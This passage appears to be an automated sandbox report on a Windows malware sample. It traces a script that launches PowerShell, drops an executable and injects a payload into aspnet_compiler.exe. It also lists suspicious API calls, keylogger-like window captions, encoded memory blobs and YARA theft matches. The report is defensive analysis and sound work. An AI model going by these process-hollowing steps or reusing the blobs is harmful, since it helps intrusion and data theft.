                  Source: wscript.exe, 00000003.00000003.1821033742.000001AD797A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                  Source: wscript.exe, 00000000.00000002.2006590918.00000226EB757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006799938.00000226ED757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004389908.00000226EB752000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004743157.00000226EB757000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000A.00000002.2994176389.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000000.00000002.2006590918.00000226EB757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004389908.00000226EB752000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004743157.00000226EB757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp"v
                  Source: wscript.exe, 00000003.00000003.1968533316.000001AD796A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                  Source: aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041BCE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00442554 mov eax, dword ptr fs:[00000030h]11_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0044E92E GetProcessHeap,11_2_0044E92E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00433B44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00433CD7 SetUnhandledExceptionFilter,11_2_00433CD7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 162.159.129.233 443Jump to behavior
                  Source: x.exe.1.dr, Program.csReference to suspicious API methods: BaseApp.ReadProcessMemory(processHandle, address, ref baseAddress, 4, ref bytesRead)
                  Source: x.exe.1.dr, Program.csReference to suspicious API methods: BaseApp.VirtualAllocEx(processHandle, imageBase, size, 12288, 64)
                  Source: x.exe.1.dr, Program.csReference to suspicious API methods: BaseApp.WriteProcessMemory(Config.processInfo.ProcessHandle, newImageBase, executablePayload, size, ref bytesWritten)
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 470000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 285008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 470000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: AFE008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00410F36
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00418754 mouse_event,11_2_00418754
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\&
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\26
                  Source: aspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\I
                  Source: aspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3S
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\4
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
                  Source: aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
                  Source: aspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\79
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\30
                  Source: aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00433E0A cpuid 11_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,11_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,11_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,11_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,11_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,11_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,11_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,11_2_00450D42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,11_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00450E6A
                  Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00434010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041A7A2 GetUserNameW,11_2_0041A7A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00448057
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2994921734.000000000239F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1850661302.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7908, type: MEMORYSTR
